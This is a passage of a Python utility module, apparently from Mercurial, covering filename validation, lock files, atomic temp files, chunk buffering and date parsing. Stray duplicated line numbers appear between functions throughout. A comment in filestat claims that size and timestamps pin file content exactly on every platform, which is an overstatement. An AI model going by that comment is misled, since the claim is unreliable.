                # control characters are invalid in Windows filenames
                return _("filename contains '%s', which is invalid "
                         "on Windows") % escapestr(c)
        # a reserved device name is invalid even with an extension
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        # trailing dot or space is rejected, except for the special
        # components '.' and '..'
        t = n[-1:]
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t
1350
1350
# pick the platform-appropriate filename validator and timer
if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

if safehasattr(time, "perf_counter"):
    # prefer perf_counter where available (Python 3.3+)
    timer = time.perf_counter
1360
1360
def makelock(info, pathname):
    """Create a lock file at *pathname* whose content is *info*.

    Tries a symlink first; falls back to an exclusively-created regular
    file when symlinks are unavailable or fail for a non-EEXIST reason.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        # an existing lock is a real error; other failures (e.g. the
        # filesystem not supporting symlinks) fall through to the
        # regular-file path below
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    # O_EXCL makes creation fail if the lock file already exists
    ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
    os.write(ld, info)
    os.close(ld)
1373
1373
def readlock(pathname):
    """Return the payload stored in the lock at pathname.

    Mirror image of makelock(): read the symlink target when the lock is
    a symlink, otherwise (not a symlink, or no symlink support at all)
    read the contents of the regular lock file.
    """
    try:
        return os.readlink(pathname)
    except OSError as err:
        # EINVAL: exists but is not a symlink; ENOSYS: no kernel support
        if err.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError:  # platform os module lacks symlink
        pass
    fp = posixfile(pathname)
    data = fp.read()
    fp.close()
    return data
1386
1386
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    # fall back to a path-based stat for file-like objects that only
    # expose a .name attribute
    fileno = getattr(fp, 'fileno', None)
    if fileno is None:
        return os.stat(fp.name)
    return os.fstat(fileno())
1393
1393
1394 # File system features
1394 # File system features
1395
1395
def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    st1 = os.lstat(path)
    dirpath, base = os.path.split(path)
    folded = base.upper()
    if folded == base:
        folded = base.lower()
    if folded == base:
        # name folds to itself both ways: no evidence against sensitivity
        return True
    try:
        st2 = os.lstat(os.path.join(dirpath, folded))
    except OSError:
        # the folded variant doesn't resolve: treat as case-sensitive
        return True
    # same inode under both spellings means the fs folds case
    return st1 != st2
1418
1418
try:
    import re2
    # None: module present but not yet probed (see _checkre2)
    _re2 = None
except ImportError:
    # module absent; always use the stdlib re module
    _re2 = False

class _re(object):
    """Facade choosing between the re2 engine and the stdlib re module."""

    def _checkre2(self):
        # Probe re2 once and cache the verdict in the module-level flag.
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        re2able = _re2 and not (flags & ~(remod.IGNORECASE | remod.MULTILINE))
        if re2able:
            # re2 takes inline flags rather than a flags argument
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        return re2.escape if _re2 else remod.escape

re = _re()
1469
1469
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        # map normcased entry name -> on-disk spelling for one directory
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    # str.replace returns a new string; the previous code discarded the
    # result, so on Windows '\\' reached the regexp character class
    # unescaped and was parsed as an escape sequence, not a separator.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            # separator runs pass through untouched
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)
1512
1512
def getfstype(dirpath):
    '''Get the filesystem type name from a directory (best-effort)

    Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
    '''
    impl = getattr(osutil, 'getfstype', None)
    if impl is None:
        # pure build without the C helper: we simply don't know
        return None
    return impl(dirpath)
1519
1519
def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    name1 = name2 = fobj = None
    try:
        fd, name1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                     suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        name2 = '%s2~' % name1[:-2]

        oslink(name1, name2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fobj = posixfile(name2)
        return nlinks(name2) > 1
    except OSError:
        return False
    finally:
        if fobj is not None:
            fobj.close()
        for name in (name1, name2):
            try:
                if name is not None:
                    os.unlink(name)
            except OSError:
                pass
1548
1548
def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    if path.endswith(pycompat.ossep):
        return True
    altsep = pycompat.osaltsep
    # altsep may be empty/None on platforms with a single separator
    return altsep and path.endswith(altsep)
1553
1553
def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative of simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if need.'''
    sep = pycompat.ossep
    return path.split(sep)
1561
1561
def gui():
    '''Are we running in a GUI?'''
    if not pycompat.isdarwin:
        return pycompat.iswindows or encoding.environ.get("DISPLAY")
    # macOS: a GUI session may exist even without DISPLAY
    if 'SSH_CONNECTION' in encoding.environ:
        # handle SSH access to a box where the user is logged in
        return False
    isgui = getattr(osutil, 'isgui', None)
    if isgui:
        # check if a CoreGraphics session is available
        return isgui()
    # pure build; use a safe default
    return True
1576
1576
def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    dirname, basename = os.path.split(name)
    fd, temp = tempfile.mkstemp(prefix='.%s-' % basename, suffix='~',
                                dir=dirname)
    os.close(fd)
    # mkstemp creates files 0600, which is usually not what we want: if
    # the original file already exists, just copy its mode; otherwise
    # manually obey the umask via createmode.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            src = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                # nothing to copy; the empty temp file stands in
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        dst = posixfile(temp, "wb")
        for chunk in filechunkiter(src):
            dst.write(chunk)
        src.close()
        dst.close()
    except: # re-raises
        # don't leave a partial copy behind
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp
1617
1617
class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid preparative
    'exists()' examination on client side of this class.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        # a missing file is represented by stat=None; any other stat
        # failure propagates to the caller
        try:
            st = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            st = None
        return cls(st)

    @classmethod
    def fromfp(cls, fp):
        return cls(os.fstat(fp.fileno()))

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            mystat, oldstat = self.stat, old.stat
            # size + ctime + mtime pins the file content exactly on every
            # platform, provided timestamp ambiguity was avoided elsewhere
            return (mystat.st_size == oldstat.st_size and
                    mystat.st_ctime == oldstat.st_ctime and
                    mystat.st_mtime == oldstat.st_mtime)
        except AttributeError:
            pass
        try:
            # both sides missing counts as equal
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        Two stats taken within the same ctime second cannot be told apart
        by timestamp comparison alone ("S[n-1].ctime == S[n].ctime" in the
        original analysis), so any equal-ctime pair is treated as
        ambiguous regardless of mtime; advancing mtime whenever
        isambig(oldstat) holds guarantees "S[n-1].mtime != S[n].mtime"
        even when the file size is unchanged.
        """
        try:
            return self.stat.st_ctime == old.stat.st_ctime
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        advanced = (old.stat.st_mtime + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno != errno.EPERM:
                raise
            # utime() on a file created by another user raises EPERM
            # when the process lacks appropriate privileges
            return False
        return True

    def __ne__(self, other):
        return not self.__eq__(other)
1719
1719
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        # temporary copy of the target; all writes land here until close().
        # emptyok skips copying existing content when mode truncates anyway.
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        # flush pending writes and atomically rename the temp copy into
        # place; a second close() is a no-op because _fp is then closed
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            # oldstat is falsy unless checkambig was requested AND the
            # target already existed before the rename
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        # drop all buffered changes: remove the temp copy (best-effort)
        # and close the underlying file without renaming
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        # commit on clean exit, throw the changes away on exception
        if exctype is not None:
            self.discard()
        else:
            self.close()
1782
1782
def unlinkpath(f, ignoremissing=False):
    """unlink and remove the directory if it is empty"""
    if ignoremissing:
        tryunlink(f)
    else:
        unlink(f)
    # try removing directories that might now be empty; removedirs stops
    # at the first non-empty ancestor, and failures are non-fatal
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass
1794
1794
def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as err:
        # a file that is already gone is exactly the desired outcome
        if err.errno == errno.ENOENT:
            return
        raise
1802
1802
def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        # a parent is missing: build the ancestry first, then retry
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)
1830
1830
def readfile(path):
    """Return the full binary contents of the file at path."""
    fp = open(path, 'rb')
    try:
        return fp.read()
    finally:
        fp.close()
1834
1834
def writefile(path, text):
    """Replace the contents of the file at path with text (bytes)."""
    fp = open(path, 'wb')
    try:
        fp.write(text)
    finally:
        fp.close()
1838
1838
def appendfile(path, text):
    """Append text (bytes) to the file at path, creating it if needed."""
    fp = open(path, 'ab')
    try:
        fp.write(text)
    finally:
        fp.close()
1842
1842
class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def _resize(source):
            # slice over-large chunks (> 1M) into 256k pieces so later
            # partial reads never have to copy huge strings
            for piece in source:
                if len(piece) <= 2**20:
                    yield piece
                else:
                    start = 0
                    while start < len(piece):
                        yield piece[start:start + 2**18]
                        start += 2**18
        self.iter = _resize(in_iter)
        self._queue = collections.deque()
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            return ''.join(self.iter)

        queue = self._queue
        pieces = []
        remaining = l
        while remaining > 0:
            # refill the queue with roughly 256k from the source iterator
            if not queue:
                want = 2**18
                for piece in self.iter:
                    queue.append(piece)
                    want -= len(piece)
                    if want <= 0:
                        break
                if not queue:
                    break

            # Peek at the head chunk and consume from it in place rather
            # than popleft()/appendleft(): for partial reads that would
            # cost two deque mutations plus a new str for the remainder.
            head = queue[0]
            headlen = len(head)
            offset = self._chunkoffset

            if offset == 0 and remaining >= headlen:
                # consume the whole chunk
                remaining -= headlen
                queue.popleft()
                pieces.append(head)
                # self._chunkoffset stays at 0
                continue

            unread = headlen - offset

            if remaining >= unread:
                # consume the rest of a partially-read chunk; offset is
                # nonzero here (the branch above took offset == 0), so
                # the slice never degenerates into a full copy
                remaining -= unread
                queue.popleft()
                pieces.append(head[offset:])
                self._chunkoffset = 0
            else:
                # take only part of the chunk
                pieces.append(head[offset:offset + remaining])
                self._chunkoffset += remaining
                remaining -= unread

        return ''.join(pieces)
1922
1922
def filechunkiter(f, size=131072, limit=None):
    """Generate the data in file ``f`` in chunks.

    Each chunk is at most ``size`` bytes (default 131072); at most
    ``limit`` bytes total are read when a limit is given (default is to
    read all data). Chunks may be shorter than ``size`` for the final
    chunk, or for file-like objects (sockets and the like) that return
    short reads.
    """
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        nbytes = size if limit is None else min(limit, size)
        # a zero-byte budget reads nothing and terminates the loop
        data = nbytes and f.read(nbytes)
        if not data:
            break
        if limit:
            limit -= len(data)
        yield data
1943
1943
def makedate(timestamp=None):
    '''Return a unix timestamp (or the current time) as a (unixtime,
    offset) tuple based off the local timezone.'''
    if timestamp is None:
        timestamp = time.time()
    if timestamp < 0:
        hint = _("check your clock")
        raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
    # the difference between the UTC and local renderings of the same
    # instant is exactly the local zone's offset from UTC
    utcview = datetime.datetime.utcfromtimestamp(timestamp)
    localview = datetime.datetime.fromtimestamp(timestamp)
    delta = utcview - localview
    tz = delta.days * 86400 + delta.seconds
    return timestamp, tz
1956
1956
def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
    """represent a (unixtime, offset) tuple as a localized time.
    unixtime is seconds since the epoch, and offset is the time zone's
    number of seconds away from UTC.

    In addition to strftime directives, the format may contain %1 and %2
    (sign+hours and minutes of the offset) or %z as an alias for %1%2.

    >>> datestr((0, 0))
    'Thu Jan 01 00:00:00 1970 +0000'
    >>> datestr((42, 0))
    'Thu Jan 01 00:00:42 1970 +0000'
    >>> datestr((-42, 0))
    'Wed Dec 31 23:59:18 1969 +0000'
    >>> datestr((0x7fffffff, 0))
    'Tue Jan 19 03:14:07 2038 +0000'
    >>> datestr((-0x80000000, 0))
    'Fri Dec 13 20:45:52 1901 +0000'
    """
    t, tz = date or makedate()
    if "%1" in format or "%2" in format or "%z" in format:
        # expand the offset placeholders textually before handing the
        # format to strftime
        sign = (tz > 0) and "-" or "+"
        minutes = abs(tz) // 60
        q, r = divmod(minutes, 60)
        format = format.replace("%z", "%1%2")
        format = format.replace("%1", "%c%02d" % (sign, q))
        format = format.replace("%2", "%02d" % r)
    # shift to zone-local time, then clamp to the signed 32-bit range
    # so the datetime arithmetic below cannot overflow the doctested span
    d = t - tz
    if d > 0x7fffffff:
        d = 0x7fffffff
    elif d < -0x80000000:
        d = -0x80000000
    # Never use time.gmtime() and datetime.datetime.fromtimestamp()
    # because they use the gmtime() system call which is buggy on Windows
    # for negative values.
    t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
    s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
    return s
1992
1992
def shortdate(date=None):
    """turn (timestamp, tzoff) tuple into iso 8631 date."""
    isofmt = '%Y-%m-%d'
    return datestr(date, format=isofmt)
1996
1996
def parsetimezone(s):
    """find a trailing timezone, if any, in string, and return a
    (offset, remainder) pair; offset is None when no zone is found"""

    # named zones we understand both mean UTC
    if s.endswith(("GMT", "UTC")):
        return 0, s[:-3].rstrip()

    # Unix-style timezones [+-]hhmm
    if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
        # a '+' zone is ahead of UTC, so its unixtime offset is negative
        negate = -1 if s[-5] == "+" else 1
        hh = int(s[-4:-2])
        mm = int(s[-2:])
        return negate * (hh * 3600 + mm * 60), s[:-5].rstrip()

    # ISO8601 trailing Z
    if s.endswith("Z") and s[-2:-1].isdigit():
        return 0, s[:-1]

    # ISO8601-style [+-]hh:mm
    if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
        s[-5:-3].isdigit() and s[-2:].isdigit()):
        negate = -1 if s[-6] == "+" else 1
        hh = int(s[-5:-3])
        mm = int(s[-2:])
        return negate * (hh * 3600 + mm * 60), s[:-6]

    return None, s
2024
2024
def strdate(string, format, defaults=None):
    """parse a localized time string and return a (unixtime, offset) tuple.
    if the string cannot be parsed, ValueError is raised.

    defaults maps format-part groups (e.g. "mb", "HI") to a
    (biased, today) value pair, as built by parsedate(); it supplies
    values for parts the format does not mention.
    """
    if defaults is None:
        defaults = {}

    # NOTE: unixtime = localunixtime + offset
    offset, date = parsetimezone(string)

    # add missing elements from defaults
    usenow = False # default to using biased defaults
    for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
        part = pycompat.bytestr(part)
        # a group matches if any of its directives appears in the format
        found = [True for p in part if ("%"+p) in format]
        if not found:
            # append the default value and a matching directive so
            # strptime still sees a complete date/time
            date += "@" + defaults[part][usenow]
            format += "@%" + part[0]
        else:
            # We've found a specific time element, less specific time
            # elements are relative to today
            usenow = True

    timetuple = time.strptime(encoding.strfromlocal(date),
                              encoding.strfromlocal(format))
    localunixtime = int(calendar.timegm(timetuple))
    if offset is None:
        # local timezone
        unixtime = int(time.mktime(timetuple))
        offset = unixtime - localunixtime
    else:
        unixtime = localunixtime + offset
    return unixtime, offset
2057
2057
def parsedate(date, formats=None, bias=None):
    """parse a localized date/time and return a (unixtime, offset) tuple.

    The date may be a "unixtime offset" string or in one of the specified
    formats. If the date already is a (unixtime, offset) tuple, it is returned.

    >>> parsedate(b' today ') == parsedate(
    ...     datetime.date.today().strftime('%b %d').encode('ascii'))
    True
    >>> parsedate(b'yesterday ') == parsedate(
    ...     (datetime.date.today() - datetime.timedelta(days=1)
    ...     ).strftime('%b %d').encode('ascii'))
    True
    >>> now, tz = makedate()
    >>> strnow, strtz = parsedate(b'now')
    >>> (strnow - now) < 1
    True
    >>> tz == strtz
    True
    """
    if bias is None:
        bias = {}
    if not date:
        return 0, 0
    if isinstance(date, tuple) and len(date) == 2:
        # already parsed
        return date
    if not formats:
        formats = defaultdateformats
    date = date.strip()

    # symbolic dates, possibly localized
    if date == 'now' or date == _('now'):
        return makedate()
    if date == 'today' or date == _('today'):
        date = datetime.date.today().strftime(r'%b %d')
        date = encoding.strtolocal(date)
    elif date == 'yesterday' or date == _('yesterday'):
        date = (datetime.date.today() -
                datetime.timedelta(days=1)).strftime(r'%b %d')
        date = encoding.strtolocal(date)

    try:
        # fast path: "unixtime offset"
        when, offset = map(int, date.split(' '))
    except ValueError:
        # fill out defaults
        now = makedate()
        defaults = {}
        for part in ("d", "mb", "yY", "HI", "M", "S"):
            # this piece is for rounding the specific end of unknowns
            b = bias.get(part)
            if b is None:
                if part[0:1] in "HMS":
                    b = "00"
                else:
                    b = "0"

            # this piece is for matching the generic end to today's date
            n = datestr(now, "%" + part[0:1])

            defaults[part] = (b, n)

        # try each candidate format until one parses
        for format in formats:
            try:
                when, offset = strdate(date, format, defaults)
            except (ValueError, OverflowError):
                pass
            else:
                break
        else:
            raise error.ParseError(_('invalid date: %r') % date)
    # validate explicit (probably user-specified) date and
    # time zone offset. values must fit in signed 32 bits for
    # current 32-bit linux runtimes. timezones go from UTC-12
    # to UTC+14
    if when < -0x80000000 or when > 0x7fffffff:
        raise error.ParseError(_('date exceeds 32 bits: %d') % when)
    if offset < -50400 or offset > 43200:
        raise error.ParseError(_('impossible time zone offset: %d') % offset)
    return when, offset
2136
2136
def matchdate(date):
    """Return a function that matches a given date match specifier

    Formats include:

    '{date}' match a given date to the accuracy provided

    '<{date}' on or before a given date

    '>{date}' on or after a given date

    >>> p1 = parsedate(b"10:29:59")
    >>> p2 = parsedate(b"10:30:00")
    >>> p3 = parsedate(b"10:30:59")
    >>> p4 = parsedate(b"10:31:00")
    >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
    >>> f = matchdate(b"10:30")
    >>> f(p1[0])
    False
    >>> f(p2[0])
    True
    >>> f(p3[0])
    True
    >>> f(p4[0])
    False
    >>> f(p5[0])
    False
    """

    def lower(date):
        # earliest timestamp the (possibly partial) date can mean:
        # bias missing month/day to 1
        d = {'mb': "1", 'd': "1"}
        return parsedate(date, extendeddateformats, d)[0]

    def upper(date):
        # latest timestamp the (possibly partial) date can mean: bias
        # missing fields high, trying month lengths from 31 down to 28
        d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
        for days in ("31", "30", "29"):
            try:
                d["d"] = days
                return parsedate(date, extendeddateformats, d)[0]
            except Abort:
                pass
        d["d"] = "28"
        return parsedate(date, extendeddateformats, d)[0]

    date = date.strip()

    if not date:
        raise Abort(_("dates cannot consist entirely of whitespace"))
    elif date[0] == "<":
        if not date[1:]:
            raise Abort(_("invalid day spec, use '<DATE'"))
        when = upper(date[1:])
        return lambda x: x <= when
    elif date[0] == ">":
        if not date[1:]:
            raise Abort(_("invalid day spec, use '>DATE'"))
        when = lower(date[1:])
        return lambda x: x >= when
    elif date[0] == "-":
        # '-N': within the last N days
        try:
            days = int(date[1:])
        except ValueError:
            raise Abort(_("invalid day spec: %s") % date[1:])
        if days < 0:
            raise Abort(_("%s must be nonnegative (see 'hg help dates')")
                % date[1:])
        when = makedate()[0] - days * 3600 * 24
        return lambda x: x >= when
    elif " to " in date:
        # 'A to B': inclusive range from the start of A to the end of B
        a, b = date.split(" to ")
        start, stop = lower(a), upper(b)
        return lambda x: x >= start and x <= stop
    else:
        # a bare (possibly partial) date matches the whole span it covers
        start, stop = lower(date), upper(date)
        return lambda x: x >= start and x <= stop
2212
2212
def stringmatcher(pattern, casesensitive=True):
    """
    accepts a string, possibly starting with 're:' or 'literal:' prefix.
    returns the matcher name, pattern, and matcher function.
    missing or unknown prefixes are treated as literal matches.

    helper for tests:
    >>> def test(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])
    >>> def itest(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])

    exact matching (no prefix):
    >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
    ('literal', 'abcdefg', [False, False, True])

    regex matching ('re:' prefix)
    >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
    ('re', 'a.+b', [False, False, True])

    force exact matches ('literal:' prefix)
    >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
    ('literal', 're:foobar', [False, True])

    unknown prefixes are ignored and treated as literals
    >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
    ('literal', 'foo:bar', [False, False, True])

    case insensitive regex matches
    >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
    ('re', 'A.+b', [False, False, True])

    case insensitive literal matches
    >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
    ('literal', 'ABCDEFG', [False, False, True])
    """
    if pattern.startswith('re:'):
        pattern = pattern[3:]
        flags = 0 if casesensitive else remod.I
        try:
            regex = remod.compile(pattern, flags)
        except remod.error as e:
            raise error.ParseError(_('invalid regular expression: %s')
                                   % e)
        return 're', pattern, regex.search
    if pattern.startswith('literal:'):
        pattern = pattern[8:]

    if casesensitive:
        matcher = pattern.__eq__
    else:
        # fold both sides through the same lowercasing for comparison
        ipat = encoding.lower(pattern)
        matcher = lambda s: ipat == encoding.lower(s)
    return 'literal', pattern, matcher
2271
2271
def shortuser(user):
    """Return a short representation of a user name or email address."""
    # drop the domain of an email address
    user = user.partition('@')[0]
    # keep only what follows an opening angle bracket, if present
    _head, sep, tail = user.partition('<')
    if sep:
        user = tail
    # trim at the first space, then at the first dot
    user = user.partition(' ')[0]
    user = user.partition('.')[0]
    return user
2287
2287
def emailuser(user):
    """Return the user portion of an email address."""
    # drop the domain, then anything before an opening angle bracket
    user = user.partition('@')[0]
    _head, sep, tail = user.partition('<')
    if sep:
        user = tail
    return user
2297
2297
def email(author):
    '''get email of author.'''
    stop = author.find('>')
    if stop == -1:
        stop = len(author)
    # with no '<', find returns -1 and the slice starts at index 0
    return author[author.find('<') + 1:stop]
2304
2304
def ellipsis(text, maxlength=400):
    """Trim string to at most maxlength (default: 400) columns in display."""
    marker = '...'
    return encoding.trim(text, maxlength, ellipsis=marker)
2308
2308
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity

    unittable is a sequence of (multiplier, divisor, format) triples
    ordered from largest to smallest unit; a row's format is used once
    abs(count) reaches multiplier * divisor, and the last row's format
    is the fallback for smaller counts.
    '''

    def go(count):
        magnitude = abs(count)
        for multiplier, divisor, fmt in unittable:
            if magnitude >= divisor * multiplier:
                return fmt % (count / float(divisor))
        # no threshold reached: render with the smallest unit
        return unittable[-1][2] % count

    return go
2319
2319
def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
    ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
    ...
    ParseError: fromline must be strictly positive
    """
    if toline < fromline:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    # callers use 1-based inclusive bounds; Python ranges are 0-based
    # half-open, so only the lower bound shifts
    return fromline - 1, toline
2340
2340
# bytecount(n) renders a byte quantity with the largest fitting unit.
# Each row is (multiplier, divisor, format): a format is used once
# abs(count) >= multiplier * divisor, so fewer decimals are shown as the
# rendered number grows (e.g. '%.2f GB' below 10 GB, '%.0f GB' above 100).
bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )
2353
2353
# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    """normalize every line ending in s to LF"""
    return _eolre.sub('\n', s)

def tocrlf(s):
    """normalize every line ending in s to CRLF"""
    return _eolre.sub('\r\n', s)

# choose converters to and from the platform's native line ending
if pycompat.oslinesep == '\r\n':
    tonativeeol, fromnativeeol = tocrlf, tolf
else:
    tonativeeol, fromnativeeol = pycompat.identity, pycompat.identity
2371
2371
def escapestr(s):
    """Return s with special characters backslash-escaped.

    Calls the codec function underlying s.encode('string_escape')
    directly for Python 3 compatibility.
    """
    escaped, _consumed = codecs.escape_encode(s)
    return escaped
2376
2376
def unescapestr(s):
    """Reverse of escapestr: interpret backslash escape sequences in s."""
    decoded, _consumed = codecs.escape_decode(s)
    return decoded
